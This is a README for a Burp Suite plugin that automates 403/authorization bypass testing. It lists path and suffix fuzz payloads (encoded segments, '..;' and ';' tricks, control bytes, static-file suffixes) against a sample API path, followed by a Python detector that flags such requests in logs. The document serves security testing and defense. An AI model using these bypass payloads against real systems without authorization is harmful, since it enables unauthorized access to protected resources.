AutoBypass403-BurpSuite

A Burp Suite extension that automates 403/auth bypass testing.

Disclaimer: this tool is for security self-testing only; illegal use is prohibited.

ChangeLog

2022-07-16

2022-02-08

2022-06-28

2021-12-05

2021-12-04

2021-12-02

How to Run

  1. Download Bypass.jar

  2. In Burp Suite, open Extender and add Bypass.jar

  3. Select the target request, right-click and choose "send to bypass 403"

  4. Select the Bypass 403 table and view the results

  5. The fuzz rules are as follows:

/web/api/presaleConfig/list

Path FUZZ:

/%77%65%62/api/presaleConfig/list
/web;/api/presaleConfig/list
/images/..;/web/api/presaleConfig/list
/images;/../web/api/presaleConfig/list
/%2e/web/api/presaleConfig/list
/;/web/api/presaleConfig/list
/./web/api/presaleConfig/list
//web/api/presaleConfig/list
/web%20/api/presaleConfig/list
/web%09/api/presaleConfig/list
/.;/web/api/presaleConfig/list
/..%00/web/api/presaleConfig/list
/..%0d/web/api/presaleConfig/list
/..%5c/web/api/presaleConfig/list
/#/../web/api/presaleConfig/list

/web/%61%70%69/presaleConfig/list
/web/api;/presaleConfig/list
/web/images/..;/api/presaleConfig/list
/web/images;/../api/presaleConfig/list
/web/%2e/api/presaleConfig/list
/web/;/api/presaleConfig/list
/web/./api/presaleConfig/list
/web//api/presaleConfig/list
/web/./api/presaleConfig/list
/web/api%20/presaleConfig/list
/web/api%09/presaleConfig/list
/web/.;/api/presaleConfig/list
/web/..%00/api/presaleConfig/list
/web/..%0d/api/presaleConfig/list
/web/..%5c/api/presaleConfig/list
/web/#/../api/presaleConfig/list

Suffix FUZZ:
/web/api/presaleConfig/list.js
/web/api/presaleConfig/list.css
/web/api/presaleConfig/list.json
/web/api/presaleConfig/list.html
/web/api/presaleConfig/list;.css
/web/api/presaleConfig/list;.js
/web/api/presaleConfig/list/.
/web/api/presaleConfig/list/
/web/api/presaleConfig/list/./
/web/api/presaleConfig/list%20
/web/api/presaleConfig/list%09
/web/api/presaleConfig/list?
/web/api/presaleConfig/list?error
/web/api/presaleConfig/list#
/web/api/presaleConfig/list/*
/web/api/presaleConfig/list%26
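
For the defending side, the rules above all rely on the access check and the backend disagreeing about which resource a path names. The following is an added example, not part of the plugin: a Python check that canonicalizes logged request targets and reports those that resolve to the protected path without requesting it literally. The function names, the sample log and the assumption that the backend ignores `;` parameters, control characters and static suffixes are illustrative.

```python
import re
from urllib.parse import unquote

PROTECTED = "/web/api/presaleConfig/list"   # sample path used in the rules above
STATIC_SUFFIX = re.compile(r"\.(js|css|json|html)$")  # assumed suffix-tolerant routing

def canonicalize(target: str) -> str:
    """Reduce a request target to the path a lenient backend may resolve."""
    path = re.split(r"[?#]", target, maxsplit=1)[0]    # drop query / fragment
    for _ in range(3):                                  # undo nested %-encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    stack = []
    for seg in path.replace("\\", "/").split("/"):
        seg = seg.split(";", 1)[0]                      # drop ;path parameters
        seg = re.sub(r"[\x00-\x20]", "", seg)           # drop NUL, tab, CR, space
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            continue
        stack.append(seg)
    return STATIC_SUFFIX.sub("", "/" + "/".join(stack))

def find_noncanonical(targets, protected=PROTECTED):
    """Targets that resolve to `protected` but were not requested literally."""
    hits = []
    for target in targets:
        raw_path = re.split(r"[?#]", target, maxsplit=1)[0]
        if canonicalize(target) == protected and raw_path != protected:
            hits.append(target)
    return hits

# Constructed sample of logged request targets (variants copied from the rules above).
SAMPLE_TARGETS = [
    "/web/api/presaleConfig/list",
    "/web/api/presaleConfig/list?page=2",
    "/images/logo.png",
    "/%77%65%62/api/presaleConfig/list",
    "/images/..;/web/api/presaleConfig/list",
    "/..%5c/web/api/presaleConfig/list",
    "/web/api%09/presaleConfig/list",
    "/web/api/presaleConfig/list;.css",
    "/web/api/presaleConfig/list.json",
]

if __name__ == "__main__":
    for hit in find_noncanonical(SAMPLE_TARGETS):
        print("non-canonical request for protected path:", hit)
```

Applying the access rule to the canonical path, or rejecting any target whose raw path differs from its canonical form, removes the mismatch these rules test for.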

Thanks